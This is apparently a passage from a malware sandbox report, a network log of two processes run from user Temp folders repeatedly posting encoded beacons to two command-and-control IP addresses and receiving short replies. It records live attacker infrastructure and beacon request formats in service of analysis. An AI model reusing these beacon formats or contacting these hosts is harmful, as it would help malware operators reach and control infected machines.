                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      463192.168.2.550307193.233.132.167808024C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:32:06.574487925 CEST309OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
                                                                                                                                                                                                                                      Apr 19, 2024 03:32:06.828105927 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:32:06 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      464192.168.2.550308193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:32:06.851327896 CEST312OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                                                                                                                                                                                                                                      Apr 19, 2024 03:32:07.103713036 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:32:06 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      465192.168.2.550309193.233.132.167808024C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:32:07.198774099 CEST155OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:32:07.447228909 CEST197INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:32:07 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      466192.168.2.550310193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:32:07.463725090 CEST158OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:32:07.712004900 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:32:07 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      467192.168.2.550311193.233.132.167808024C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:32:07.695970058 CEST309OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
                                                                                                                                                                                                                                      Apr 19, 2024 03:32:07.941240072 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:32:07 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      468192.168.2.550312193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:32:07.957818031 CEST312OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                                                                                                                                                                                                                                      Apr 19, 2024 03:32:08.204591036 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:32:08 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      469192.168.2.550313193.233.132.167808024C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:32:08.306380987 CEST155OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:32:08.554958105 CEST197INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:32:08 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      470192.168.2.550314193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:32:08.572854996 CEST158OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:32:08.820569038 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:32:08 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      471192.168.2.550315193.233.132.167808024C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:32:08.802396059 CEST309OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
                                                                                                                                                                                                                                      Apr 19, 2024 03:32:09.051578999 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:32:08 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      472192.168.2.550316193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:32:09.072012901 CEST312OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                                                                                                                                                                                                                                      Apr 19, 2024 03:32:09.323909044 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:32:09 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      473192.168.2.550317193.233.132.167808024C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:32:09.417165041 CEST155OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:32:09.665031910 CEST197INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:32:09 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      474192.168.2.550318193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:32:09.679480076 CEST158OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:32:09.923858881 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:32:09 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      475192.168.2.550319193.233.132.167808024C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:32:09.912117958 CEST309OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
                                                                                                                                                                                                                                      Apr 19, 2024 03:32:10.160268068 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:32:10 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      476192.168.2.550320193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:32:10.172388077 CEST312OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                                                                                                                                                                                                                                      Apr 19, 2024 03:32:10.421458006 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:32:10 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      477192.168.2.550321193.233.132.167808024C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:32:10.525193930 CEST155OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:32:10.773844004 CEST197INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:32:10 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      478192.168.2.550322193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:32:10.774523973 CEST158OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:32:11.020555019 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:32:10 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      479192.168.2.550323193.233.132.167808024C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:32:11.020083904 CEST309OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
